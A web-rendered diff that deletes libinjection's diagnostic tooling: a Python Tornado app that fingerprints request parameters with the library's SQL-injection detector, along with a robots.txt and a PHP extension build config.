ids = self.request.arguments.get('id', [])
|
||||
|
||||
if len(ids) == 1:
|
||||
formvalue = ids[0]
|
||||
else:
|
||||
formvalue = ''
|
||||
|
||||
val = urllib.unquote(formvalue)
|
||||
parsed = []
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL))
|
||||
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL))
|
||||
|
||||
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
|
||||
self.add_header('Pragma', 'no-cache')
|
||||
self.add_header('Expires', '0')
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.render("tokens.html",
|
||||
title='libjection sqli token parsing diagnostics',
|
||||
version = libinjection.version(),
|
||||
parsed=parsed,
|
||||
formvalue=val,
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
def get_fingerprints(self):
|
||||
#unquote = urllib.unquote
|
||||
#detectsqli = libinjection.detectsqli
|
||||
|
||||
ids = self.request.arguments.get('id', [])
|
||||
if len(ids) == 1:
|
||||
formvalue = ids[0]
|
||||
else:
|
||||
formvalue = ''
|
||||
|
||||
args = []
|
||||
extra = {}
|
||||
qssqli = False
|
||||
|
||||
sqlstate = libinjection.sqli_state()
|
||||
|
||||
allfp = {}
|
||||
for name,values in self.request.arguments.iteritems():
|
||||
if name == 'type':
|
||||
continue
|
||||
|
||||
fps = []
|
||||
|
||||
val = values[0]
|
||||
val = urllib.unquote(val)
|
||||
if len(val) == 0:
|
||||
continue
|
||||
libinjection.sqli_init(sqlstate, val, 0)
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['unquoted', 'ansi', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['unquoted', 'mysql', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['single', 'ansi', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['single', 'mysql', issqli, pat])
|
||||
|
||||
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL)
|
||||
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
fps.append(['double', 'mysql', issqli, pat])
|
||||
|
||||
allfp[name] = {
|
||||
'value': breakify(breakapart(val)),
|
||||
'fingerprints': fps
|
||||
}
|
||||
|
||||
for name,values in self.request.arguments.iteritems():
|
||||
if name == 'type':
|
||||
continue
|
||||
for val in values:
|
||||
# do it one more time include cut-n-paste was already url-encoded
|
||||
val = urllib.unquote(val)
|
||||
if len(val) == 0:
|
||||
continue
|
||||
|
||||
# swig returns 1/0, convert to True False
|
||||
libinjection.sqli_init(sqlstate, val, 0)
|
||||
issqli = bool(libinjection.is_sqli(sqlstate))
|
||||
|
||||
# True if any issqli values are true
|
||||
qssqli = qssqli or issqli
|
||||
val = breakapart(val)
|
||||
|
||||
pat = sqlstate.fingerprint
|
||||
if not issqli:
|
||||
pat = 'see below'
|
||||
args.append([name, val, issqli, pat])
|
||||
|
||||
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
|
||||
self.add_header('Pragma', 'no-cache')
|
||||
self.add_header('Expires', '0')
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.render("form.html",
|
||||
title='libjection sqli diagnostic',
|
||||
version = libinjection.version(),
|
||||
is_sqli=qssqli,
|
||||
args=args,
|
||||
allfp = allfp,
|
||||
formvalue=formvalue,
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
import os
|
||||
settings = {
|
||||
"static_path": os.path.join(os.path.dirname(__file__), "static"),
|
||||
"template_path": os.path.join(os.path.dirname(__file__), "."),
|
||||
"xsrf_cookies": False,
|
||||
"gzip": False
|
||||
}
|
||||
|
||||
application = tornado.web.Application([
|
||||
(r"/diagnostics", NullHandler),
|
||||
(r'/xsstest', XssTestHandler),
|
||||
(r'/bootstrap/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/bootstrap' }),
|
||||
(r'/jquery/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/jquery' }),
|
||||
(r'/robots.txt', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
|
||||
(r'/favicon.ico', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
|
||||
(r"/([a-z-]*)", PageHandler)
|
||||
], **settings)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
tornado.options.parse_command_line()
|
||||
|
||||
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s %(process)d %(message)s")
|
||||
|
||||
application.listen(8888)
|
||||
tornado.ioloop.IOLoop.instance().start()
|
||||
|
Binary file not shown.
Before Width: | Height: | Size: 1.9 KiB |
Binary file not shown.
Before Width: | Height: | Size: 4.2 KiB |
Binary file not shown.
Before Width: | Height: | Size: 3.1 KiB |
|
@ -1,2 +0,0 @@
|
|||
User-agent: *
|
||||
Disallow:
|
|
@ -1,13 +0,0 @@
|
|||
dnl based on
|
||||
dnl http://www.php.net/manual/en/internals2.buildsys.configunix.php
|
||||
|
||||
|
||||
PHP_ARG_ENABLE(libinjection, for libinjection support,
|
||||
[ --enable-libinjection Include libinjection])
|
||||
|
||||
dnl Check whether the extension is enabled at all
|
||||
if test "$PHP_LIBINJECTION" != "no"; then
|
||||
dnl Finally, tell the build system about the extension and what files are needed
|
||||
PHP_NEW_EXTENSION(libinjection, libinjection_sqli.c libinjection_wrap.c, $ext_shared)
|
||||
PHP_SUBST(LIBINJECTION_SHARED_LIBADD)
|
||||
fi
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue